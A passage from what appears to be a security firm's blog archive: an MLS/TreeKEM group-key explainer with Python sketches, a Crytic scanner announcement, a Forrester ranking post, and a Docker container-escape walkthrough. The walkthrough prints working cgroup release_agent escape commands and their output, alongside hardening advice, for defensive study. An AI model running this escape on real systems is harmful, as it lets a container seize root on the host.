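# Setup: every member generates a sender key and encrypts it once per peer,
# i.e. N-1 auxiliary messages per member, quadratically many in total.
sender_keys = {name: AESGCM.generate_key(bit_length=256) for name in members}
setup_messages = []
for owner in members:
    for peer in members:
        if peer == owner:
            continue
        nonce = os.urandom(12)
        channel = AESGCM(pair_keys[frozenset({owner, peer})])
        setup_messages.append((owner, peer, nonce,
                               channel.encrypt(nonce, sender_keys[owner], None)))
print(len(setup_messages))  # 12 auxiliary messages for a group of 4

# Steady state: one encryption, broadcast to everyone.
nonce = os.urandom(12)
broadcast = AESGCM(sender_keys["Wilna"]).encrypt(nonce, b"Vince suspects nothing", None)
# Any member who holds Wilna's sender key can decrypt the single ciphertext.
print(AESGCM(sender_keys["Wilna"]).decrypt(nonce, broadcast, None))
```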

The grey arrows represent application messages encrypted under a symmetric key.

Although there are three arrows here, they are all the same ciphertext, so the application message only needs to be encrypted and broadcast once. Thus, after the setup phase, each outgoing application message only costs a single encryption. So we’re done, right? Wrong, of course wrong. Because…

What about Removal?

The catch is the assumption that the setup phase runs only once. It actually runs every time the group is modified. Suppose in the process of premeditating this "retirement party," the group finds out that Zayne has been leaking details to Vince the whole time. Naturally, they kick Zayne out. Now Zayne still knows all the sender keys, so if he talks to Vince and gets an encrypted transcript of the group conversation that happened after his departure, he would still be able to decrypt it. This is a no-no, since Zayne has already defected. To prevent this from happening, each remaining user in the group has to create a new sender key and share it with everyone else through their pairwise channels. Again, this is Θ(N²) total auxiliary messages, which can be a lot. So if we want to tolerate tons of group modifications,³ we're going to have to find a way to bring down the number of auxiliary messages sent during the setup phase, while still being able to keep using sender keys for application messages. A well-known secret in computer science is that when the naïve solutions of pairs and lists don't work, there's a next logical step:

Solution #3: Trees

We would like to have sender keys (since they make application messages efficient). We also want to be able to transmit new sender keys to subsets of the group without using too many auxiliary messages. The important insight here is that, when we remove a member, we shouldn’t need to individually send new keying information to every single remaining member like we had to in the previous solution. After all, we need to send this to the whole group minus just one person. So why not have public keys that cover large subsets of the group, and use those for sending auxiliary messages? This is exactly what the MLS ratchet tree (a.k.a. TreeKEM) affords us.

The MLS ratchet tree is a binary tree⁴ whose leaves correspond to members of the group, and whose non-leaf nodes, called intermediate nodes, carry a Diffie-Hellman public key and private key. Intermediate nodes don't represent people, computers, or locations on a network; they're just pieces of data that facilitate auxiliary message sending. We also allow nodes to be blank, meaning that they do not have an associated keypair. A node that does have an associated keypair is said to be filled. Every member in the group retains a copy of the ratchet tree, minus the private keys. Knowledge of the private keys follows the ratchet tree property:

Ratchet Tree Property: If a member M is a descendant of intermediate node N, then M knows the private key of N.
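As a toy model of this property, the sketch below stores a complete binary tree heap-style in an array and prints which node private keys each member holds: their own leaf plus every ancestor up to the root. (The real MLS tree is left-balanced, uses different node indexing, and allows blank nodes; see footnote 4.)

```python
# Toy model of the ratchet tree property in a complete binary tree stored
# heap-style: node 0 is the root, children of node i are 2i+1 and 2i+2.
# Real MLS uses a left-balanced tree with different node indexing.

members = ["Wilna", "Xavier", "Yolanda", "Zayne"]
num_leaves = len(members)
num_nodes = 2 * num_leaves - 1          # 3 intermediate nodes + 4 leaves
first_leaf = num_nodes - num_leaves     # leaves occupy the last positions

def known_private_keys(member_index):
    """Indices of the nodes whose private keys this member holds:
    their own leaf plus every ancestor up to the root."""
    node = first_leaf + member_index
    path = [node]
    while node != 0:
        node = (node - 1) // 2          # parent in heap indexing
        path.append(node)
    return path

for i, name in enumerate(members):
    print(name, "knows the private keys of nodes", known_private_keys(i))
# Every member knows the root's private key (node 0), so anything derived
# from it (such as the sender keys) is shared by the whole group.
```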

*deep breath* Sender keys are derived via a key-derivation function (KDF) from the root node's private key, and each intermediate node's private key is derived via KDF from its most-recently updated child's private key.⁵ Upon the removal of a user, new private keys are distributed to the resolutions of the copath nodes, i.e., the maximal non-blank nodes of the subtrees whose roots are the siblings of the updated nodes.

That paragraph alone took about 10 minutes to write, so let’s just see…

A Small Example

We start off with a group like so:

Zayne wants out, so Yolanda removes him.⁶ To remove him, Yolanda will first blank out Zayne and all his ancestors:

The boxes with red slashes through them represent blank nodes.

Yolanda needs to contribute new keying information to the new group so that the new sender keys can be derived from the new root’s private key. To do this, she generates a new personal keypair pubY’ and privY’ and derives all her ancestors’ keypairs by iteratively applying a KDF to the private key and computing its corresponding public key (this is called “ratcheting,” whence “ratchet tree”).

The green circles indicate recently updated nodes.
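A minimal sketch of that ratcheting step, with X25519 and HKDF standing in for the real MLS key schedule (which chains node and path secrets; see footnote 5). Each level's private key is derived from the secret below it, and only the resulting public keys are broadcast:

```python
# Minimal sketch of "ratcheting" a fresh leaf secret up the tree: each
# ancestor's keypair is derived from the previous level's secret.
# Real MLS derives node keypairs from chained node/path secrets (footnote 5).
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def ratchet(secret):
    """Derive the next level's 32-byte secret from the current one."""
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                info=b"path secret").derive(secret)

# Yolanda picks a fresh leaf secret, then walks up her path:
# leaf -> intermediate node -> root, two levels in the small example.
secret = os.urandom(32)
path_keypairs = []
for level in ["leaf (privY')", "parent (privY'')", "root (privY''')"]:
    private_key = X25519PrivateKey.from_private_bytes(secret)
    public_key = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.Raw, format=serialization.PublicFormat.Raw)
    path_keypairs.append((level, private_key, public_key))
    secret = ratchet(secret)  # next ancestor's secret

for level, _, public_key in path_keypairs:
    print(level, public_key.hex()[:16], "...")  # public keys are broadcast in the clear
```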

But Yolanda isn’t done. Wilna and Xavier need to be told about these new keys somehow. It’s Yolanda’s job to share this info. In particular,

  1. Every member needs to get a copy of the public keys of all updated nodes (i.e., Yolanda’s own public key and all her ancestors’). This is important. The public keys are part of the shared group state, and shared group state is how a bunch of values in the MLS protocol are derived.
  2. Every member needs to get a copy of the private keys of their nearest modified ancestor. This is in order to preserve the ratchet tree property.

Remember that the end goal is still to derive the sender keys, which means that Wilna and Xavier need to be told the value of the root private key, privY'''. This will be a consequence of item two above.

Since everyone needs public keys and public keys are not secret, Yolanda can just broadcast them as unencrypted auxiliary messages. But private keys are more sensitive. She needs to encrypt them for just the members who need them. This is where we use the ratchet tree property. If she wants Wilna and Xavier to be able to read an auxiliary message containing privY''', she need only encrypt the message under pubWX, since Wilna and Xavier are descendants of the WX intermediate node, and will therefore be able to decrypt anything encrypted under pubWX.⁷ This describes how the auxiliary messages are sent to the rest of the group:

The solid black arrows above indicate public-key encrypted messages. The dashed arrows indicate plaintext messages. The arrows do not indicate who is doing the sending (since that’s all Yolanda). They’re just meant to illustrate where in the tree the values are coming from and whom they’re intended for.
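Those solid arrows are ECIES/HPKE-style public-key encryptions (footnote 7). A minimal non-MLS sketch, using an ephemeral X25519 key plus HKDF plus AES-GCM (real HPKE has a more careful key schedule than this illustration): Yolanda encrypts the new root private key to pubWX, and anyone holding privWX, i.e., Wilna and Xavier, can open it.

```python
# Minimal ECIES-style sketch (footnote 7): encrypt the new root private key
# to the WX intermediate node's public key. Real MLS uses HPKE, which has a
# more careful key schedule than this illustration.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def ecies_encrypt(recipient_public_key, plaintext):
    ephemeral = X25519PrivateKey.generate()
    shared = ephemeral.exchange(recipient_public_key)
    key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
               info=b"ecies demo").derive(shared)
    nonce = os.urandom(12)
    return ephemeral.public_key(), nonce, AESGCM(key).encrypt(nonce, plaintext, None)

def ecies_decrypt(recipient_private_key, ephemeral_public_key, nonce, ciphertext):
    shared = recipient_private_key.exchange(ephemeral_public_key)
    key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
               info=b"ecies demo").derive(shared)
    return AESGCM(key).decrypt(nonce, ciphertext, None)

# pubWX/privWX: the WX intermediate node's keypair, known to Wilna and Xavier.
priv_wx = X25519PrivateKey.generate()
new_root_private_key = os.urandom(32)  # stand-in for privY'''

package = ecies_encrypt(priv_wx.public_key(), new_root_private_key)
assert ecies_decrypt(priv_wx, *package) == new_root_private_key
```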

Now Wilna and Xavier will update their view of the tree by saving the public keys and decrypting the root private key. Thus, everyone is on the same page and the ratchet tree property is preserved. Finally, everyone re-derives their sender keys, and the removal is complete:

Note that Zayne’s position remains blank after the removal. This saves the members from the computational overhead of shuffling themselves around and recomputing their ancestors’ keypairs. MLS defines two ways to prevent removed members from overcrowding the tree: it allows blank nodes to be removed from the right end of the tree after removals (not applicable in the example above), and it allows new members to be added in the position of previously removed members. So if the “party-planners” above wanted to replace Zayne, they could do so without making the tree bigger.

This example illustrates the smaller details in updating keys, but it doesn’t do a particularly good job at illustrating which node secrets are sent to which other nodes in the resolutions of the copath nodes. To give an idea, here’s…

A Much Bigger Example

Suppose Zayne wants to break out and go solo, but still feels the desire to be in a boy band. After cloning himself 15 times, Zayne #1 notices that one of the clones, Zayne #11, keeps hinting at breaking off and doing a solo career of his own. Zayne #1 acquiesces and removes him from the group. He sees what he’s created. Zayne #1 looks up at the stars. War soon.

Let’s see what auxiliary messages were sent when Zayne #11 was booted. In this removal process, Zayne #1 generates new secrets, ratchets them all the way up the tree, and shares them with the appropriate subtrees:

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

Notice that on the right-hand side of the tree, since you can't encrypt to a blank node, the root private key needs to be encrypted under three separate public keys. The dashed arrows were omitted for clarity, but it's still true that the public keys of all the circled nodes are broadcast in this step.

With this larger example, you might start to see a pattern in how many auxiliary messages are sent per tree update. Let's play

Can You Eyeball the Asymptotic Behavior?

We got efficient application messages with sender keys, and we’d like to say that we got efficient auxiliary messages with TreeKEM so we can call it a day. Is this true? Absolutely not, at least not entirely. Let’s first talk about the example above, where we start off with a tree whose nodes are all filled.

Removal in a Filled Tree

The Zayne example is actually worst-case removal behavior in a filled tree in terms of the number of auxiliary messages (you should prove this to yourself: what would happen if Zayne #1 removed Zayne #6 instead?). If there are N members in the group, there are at most log(N)-1 encrypted auxiliary messages that don't have to deal with blank nodes, and another log(N)-1 that do. Plus, there are log(N) public keys to share. So, to complete the sage wisdom from computer scientists of days past: if you use trees, you get O(log(N)) behavior. This is way better than the quadratic number of auxiliary messages we saw in solution #2. The same WhatsApp group of kibbitzing mumehs now only takes about 3·log₂(10,000) ≈ 40 total auxiliary messages to establish a new set of sender keys (assuming a filled tree) instead of the N(N-1) ≈ 100 million total auxiliary messages required previously.
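A quick back-of-the-envelope check of those two numbers:

```python
# Rough message-count comparison for re-keying a filled group of N members.
from math import log2

N = 10_000
sender_key_rekey = N * (N - 1)       # Solution #2: pairwise redistribution
treekem_rekey = round(3 * log2(N))   # Solution #3: roughly 3*log2(N) auxiliary messages

print(sender_key_rekey)  # 99,990,000, i.e. roughly 100 million
print(treekem_rekey)     # about 40
```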

Removal in a Tree with Blanks

This logarithmic behavior is fantastic, but we only checked the very specific case where we start with a full group and then remove one person. How efficient is it when we remove a single person from a group that already has some blanks? The good news is that it's still better than Θ(N²). The bad news is that the worst case is… well, let me just show you.

Suppose every odd-numbered Zayne was removed from the group besides Zayne #1. Finally, Zayne #2 deals the finishing blow, removing Zayne #1 and restoring peace. Here is what the update looks like:

That’s N-1 messages to remove a single person! As mentioned before, this can be a prohibitively large number of auxiliary messages for large N. Even worse, it may be possible for malicious group members to strategically remove people until the tree reaches the worst-case state, thus slowing down group operations for everyone in the group.

Dealing with this situation is an open issue, and people are actively working on resolving or at least mitigating it. As of this writing, though, there are no proposed solutions that would materially improve the worst-case behavior.

Conclusion and More Info

It’s underwhelming to end at an open issue, but this is where the protocol stands today. Efficiently updating keys is at the crux of end-to-end group messaging. The TreeKEM method, edge cases and all, is one of the most important singular contributions that MLS makes. Given that there’s still at least one open issue in the spec, you may wonder

How close is the protocol to being done?

No clue. MLS has plenty of open issues (nine as of this writing) and is being tweaked constantly. Draft 7 landed just this month, and it completely overhauled the symmetric key schedule. Inefficiencies are being shaved down as issues around authenticity, confidentiality, deniability, etc. are being patched.

What are the other implementations?

The unofficial reference implementation, mlspp, is used to create test vectors that we implementers all test against. There’s also MLS*, a project at Inria to implement and formally model the protocol in F*. And there’s even another Rust implementation, melissa, being written at Wire.

Remind me why you’re writing yet another Rust implementation?

The more implementations the better. Writing this implementation has helped find errors in mlspp and the specification itself.

Errors found in mlspp include missing important fields (a missing protocol version and a missing hash of WelcomeInfo, which enforces sequencing), incorrect tree addressing (using leaf indices instead of node indices and vice versa), and incorrectly generated test vectors. Errors we found in the specification include ambiguities (how are removed nodes pruned from the ratchet tree?), logical impossibilities (how can you add a user to the group if your WelcomeInfo doesn't include the current decryption keys?), and deontological omissions (SHOULD⁸ a user verify the broadcasted pubkeys against their derived pubkeys or not?).

Ok great, but why Rust?

*cracks knuckles*

I thought it would be nice to have an MLS implementation that has a clear API (thanks to molasses’ careful design and Rust’s strong typing), memory-safe semantics (thanks to the Rust borrow checker), thorough documentation (thanks to cargo doc and molasses’ current 43% comment-code ratio), and good performance (thanks to ZERO-COST-ABSTRACTIONS). Of course, none of these features make up for the fact that molasses is not formally verified like MLS* and may never be, but hey, nobody ever complained that cotton isn’t as bulletproof as kevlar, cuz those are for different things.

How can I help?

I don’t recommend filing issues with molasses quite yet. The spec is moving too quickly and the library has to be redesigned accordingly each time. If you would like to contribute, the MLS IETF page has a mailing list where you can read and participate in discussions. The organizers are helpful and patient, and I appreciate them immensely. If you want to write your own implementation, see the implementers’ Github repo for organizing info and test vectors.

If you are interested in reading more about the protocol and seeing some of the other open issues, you should give the spec⁹ a read.

“I want your expertise”

Well that’s going to cost you. We offer consulting in end-to-end protocol design, engineering, and auditing. Drop us a line on our contact page if you’re interested.

Thanks for reading! If you have questions or corrections, please feel free to email me at michael.rosenberg@trailofbits.com.

Footnotes:

  1. Full post-compromise security, i.e., the problem of non-deterministically deriving all new shared data so as to make the excluded parties unable to participate, is actually not easily achieved in this scheme. There is ongoing research in characterizing how post-compromise secure MLS is after a certain number of group updates.
  2. Source. This is a fantastic paper which provides a lot of context for this article. Seriously, if you want to understand this topic better, you should read the MLS spec and this paper and compare the two, since they differ in pretty subtle but significant ways. E.g., the ART scheme used in the paper does not allow intermediate nodes to be blank, which affects confidentiality of messages sent to offline members.
  3. The problem of Removal in this article is a placeholder for (a weaker form of) post-compromise security. Here, “group modifications” includes updating key material without changing group membership.
  4. Specifically, it is a left-balanced binary tree. This is fancy computer talk for “every left subtree is full,” which itself is fancy computer talk for “it behaves well when stuffed into an array.”
  5. Both these statements are technically false, but it’s way easier to think of things this way, and it’s close enough to the truth imo. In reality, sender keys are derived from a long chain of secret values relating to group state and state transitions. Node private keys are simpler, but they are also derived from chains of other secrets called “node secrets” and “path secrets.” As always, see the spec for more details.
  6. MLS doesn’t allow users to remove themselves. This is a quirk of the protocol, but it doesn’t really affect anything.
  7. If you’re confused why I say all these keys are DH keys and then use public-key encryption, it’s because the public-key encryption in MLS is done with ECIES. More specifically, it’s HPKE.
  8. The all-caps “SHOULD” means something specific in IETF RFCs. Its meaning is governed by not one but two RFCs, which are referred to as Best Current Practice 14. The linguistic conventions of RFCs are super cool and alone make it worth skimming a few specs and paying attention to their “conventions and terminology” sections. TLS is as good a place to start as any.
  9. If you want a particularly nice reading experience, you should compile the spec yourself from source. It really is appreciably better.

SVGs of the images in this post are available.

Crytic: Continuous Assurance for Smart Contracts

Note: This post has been reposted from the Truffle Suite blog.

We are proud to announce our new smart contract security product: https://crytic.io/. Crytic provides continuous assurance for smart contracts. The platform reports build status on every commit and runs a suite of security analyses for immediate feedback.

The beta will open soon. Follow us on Twitter to be notified so you can benefit from the service as soon as possible! The first three months are free.

How Crytic will secure your smart contracts

Once connected to your GitHub repository, Crytic will continuously:

  • Run our static analyzer Slither, which detects the most common smart contract vulnerabilities and will save you from critical mistakes.
  • Run your Truffle tests to ensure that no functional bugs are added while developing your project.

Slither will analyze your codebase for more than 60 types of security flaws, including reentrancy, integer overflows, race conditions, and many others. Half of these detectors are private and have not previously been available to the public. They can detect flaws for which public knowledge is limited and that no other tool can find. The recent GridLock bug would have been detected ahead of time using Crytic!

We built this platform for developers, so we integrated it with GitHub. It will watch every commit and branch to ensure that bugs are not added during development. In addition, Crytic will run the checks on every PR to facilitate your code review.

For every security issue found, Crytic will:

  • Show you a detailed report on the bug, including source-code highlighting.
  • Allow you to create a GitHub issue to keep track of the fixes easily.
  • Let you triage the results, so you can decide what needs to be fixed.

Quick Walkthrough

Adding Crytic to your system is straightforward: you just need to connect to your GitHub repository. We have first-class support for Truffle; it works out of the box! We also support most of the other smart contract platforms, including Embark, Dapp, and Etherlime. After adding your repository, the dashboard (Figure 1) will show you a summary of the project, like this crytic-demo:

Figure 1: The Crytic Dashboard

From now on, you will benefit from continuous security analyses.

Issue reports

Finding an issue is only the first part. Crytic provides the detailed information you need to understand and fix the bug:

Figure 2: Reports provide detailed information needed to understand and fix issues

A careful reader will notice the vulnerability here: the misspelled function constuctor is an ordinary public function callable by anyone, rather than a constructor that runs only at initialization. Crytic will detect these types of critical mistakes instantaneously.

Triaging issues

Once a bug has been found, the user can decide to:

  • create a GitHub issue, to easily keep track of the fix, or
  • discard the issue.

Figure 3: Crytic easily creates GitHub issues for selected reports

Crytic follows the modifications to your code and reports only new bugs that are introduced. Each new PR will be analyzed automatically:

Figure 4: Crytic is fully integrated with GitHub Pull Requests

What’s next for Crytic

We are constantly improving Crytic. Expect to see new bug detectors and new features in the future. We are planning to add:

  • Echidna and Manticore integration: to ensure your code is checked for custom security properties.
  • Automatic bug repair: Crytic will propose patches to fix the issues it finds.
  • Slither printer integration: to help visualize the underlying details of your code.
  • Delegatecall proxy checker: to prevent you from making critical—and all too common—mistakes in your upgradeability process.

Questions? Bring them to TruffleCon, and pose them to us at our booth or at our Friday workshop on automated vulnerability detection tools!

Whether or not you can make it to TruffleCon, join our Slack channel (#crytic) for support, and watch @CryticCI to find out as soon as our beta is open.

Understanding Docker container escapes

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.

Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.

Here’s a version of the PoC that launches ps on the host:

# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.

Don’t run containers with --privileged. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.

In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.

Requirements to use this technique

In fact, --privileged provides far more permissions than are needed to escape a Docker container via this method. In reality, the “only” requirements are:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

The SYS_ADMIN capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN capability due to the security risks of doing so.

Further, Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.

A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN

Using cgroups to deliver the exploit

Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

1.4 What does notify_on_release do ?
————————————
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.

Linux Kernel documentation on cgroups v1

Refining the proof of concept

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Breaking down the proof of concept

Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

To trigger this exploit we need a cgroup where we can create a release_agent file and trigger release_agent invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

To do that, we create a /tmp/cgrp directory, mount the RDMA cgroup controller, and create a child cgroup (named “x” for the purposes of this example). While not every cgroup controller has been tested, this technique should work with the majority of them.

If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma to memory to fix it. We’re using RDMA because the original PoC was only designed to work with it.

Note that cgroup controllers are global resources that can be mounted multiple times with different permissions, and changes made in one mount will apply to another.

We can see the “x” child cgroup creation and its directory listing below.

root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children  cgroup.procs  notify_on_release  rdma.current  rdma.max  tasks

Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release file. We also set the RDMA cgroup release agent to execute a /cmd script — which we will later create in the container — by writing the /cmd script path on the host to the release_agent file. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.

The files we add or modify in the container are present on the host, and it is possible to modify them from either side: via their path in the container or their path on the host.

Those operations can be seen below:

root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

Note the path to the /cmd script, which we are going to create on the host:

root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd

Now, we create the /cmd script such that it will execute the ps aux command and save its output into /output in the container by specifying the full path of the output file on the host. At the end, we also print the /cmd script to see its contents:

root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
#!/bin/sh
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output

Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh process and writing its PID to the cgroup.procs file in the “x” child cgroup directory, the script on the host will execute after /bin/sh exits. The output of ps aux performed on the host is then saved to the /output file inside the container:

root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  1.0  17564 10288 ?        Ss   13:57   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    13:57   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_gp]
root         4  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_par_gp]
root         6  0.0  0.0      0     0 ?        I<   13:57   0:00 [kworker/0:0H-kblockd]
root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]

Use containers securely

Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.

To help keep containers secure:

  • Do not use the --privileged flag or mount a Docker socket inside the container. The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the --privileged flag.
  • Do not run as root inside the container. Use a different user or user namespaces. Root in the container is the same as root on the host unless remapped with user namespaces, and it is only lightly restricted, primarily by Linux namespaces, capabilities, and cgroups.
  • Drop all capabilities (--cap-drop=all) and enable only those that are required (--cap-add=...). Many workloads don’t need any capabilities, and adding them increases the scope of a potential attack.
  • Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
  • Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
  • Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
  • Use official docker images or build your own based on them. Don’t inherit or use backdoored images.
  • Regularly rebuild your images to apply security patches. This goes without saying.

If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!

Trail of Bits Named in Forrester Wave as a Leader in Midsize Cybersecurity Consulting Services

Trail of Bits was among the select companies that Forrester invited to participate in its recent report, The Forrester Wave™: Midsize Cybersecurity Consulting Services, Q2 2019. In this evaluation, Trail of Bits was cited as a Leader. We received the highest score among all participants in the current offering category, among the highest scores in the strategy category, and the highest scores possible in sixteen of the evaluation’s criteria.

You can download the full report here!

What is the Forrester Wave™?

Forrester is a leading global research and advisory firm that offers a variety of market reports, research, analysis, and consulting services. The Forrester Wave is a specific Forrester evaluation that provides “a guide for buyers considering their purchasing options in a technology marketplace.”

When Forrester reached out to us to participate in their study, we jumped at the chance. We respect their publication a lot. In our view, the Wave is:

  • A trusted source of truth for top companies – Forrester reports are the gold standard for citations on market data.
  • Not a paid publication – If Forrester finds a weakness in a participant’s company, they won’t gloss over it.
  • Built on thoughtful criteria – It’s hard to fully comprehend what’s important in cybersecurity consulting, especially for someone relatively new to our niche industry. Assessing efficacy is tough even if you know what you’re looking for. Forrester overcomes this by getting feedback on its questions and ranking criteria from participants.

What happened?

Forrester reached out to us and our competitors for an introductory call on how to prepare as participants. We were given the option to opt out of participating, but were told we would be included in the report regardless. Participants then provided feedback on the criteria that Forrester would use to assess our competencies. Once the criteria were finalized, Forrester gathered data from us and from some of our clients on how we performed against those criteria. When the report was complete, they let all participants fact-check it. Needless to say, we were pleased to see that we’d received the highest score in the Current Offering category, and among the highest scores in the Strategy category.

The results

In addition to our ranking, Forrester made this analysis of our strengths and weaknesses:

Trail of Bits’ innovation efforts set its technical services apart. Its unique services include binary analysis, blockchain security, cryptography, and software development — many of which rely on tools that Trail of Bits developed in-house. Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent. It hosts a variety of office hours and local meetups and develops free educational resources for all levels of cybersecurity professionals. Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths. However, those high standards come with some drawbacks as customers also noted limited resources and price as concerns. Trail of Bits’ deliverables are quite technical, and clients needed to do some extra translation of those deliverables for nonsecurity[sic] executives. For clients seeking a high level of technical cybersecurity proficiency from its services firm, Trail of Bits is a top-tier choice.

Our reflections

We’re celebrating the good

Trail of Bits’ innovation efforts set its technical services apart.

Our Take: Indeed! Our investments in R&D, our focus on using cutting-edge open source tooling, and our preference for tackling tough problems help us hone our advanced techniques and innovative approach.

Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent.

Our Take: We’re happy for this work to shine through! We’re passionate about empowering emerging talent with the information and skills necessary to break into our industry and push science forward with us. Open-sourcing our in-house tools, sharing knowledge through online resources and our Empire Hacking meetup, and sponsoring emerging research are all core to our mission.

Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths.

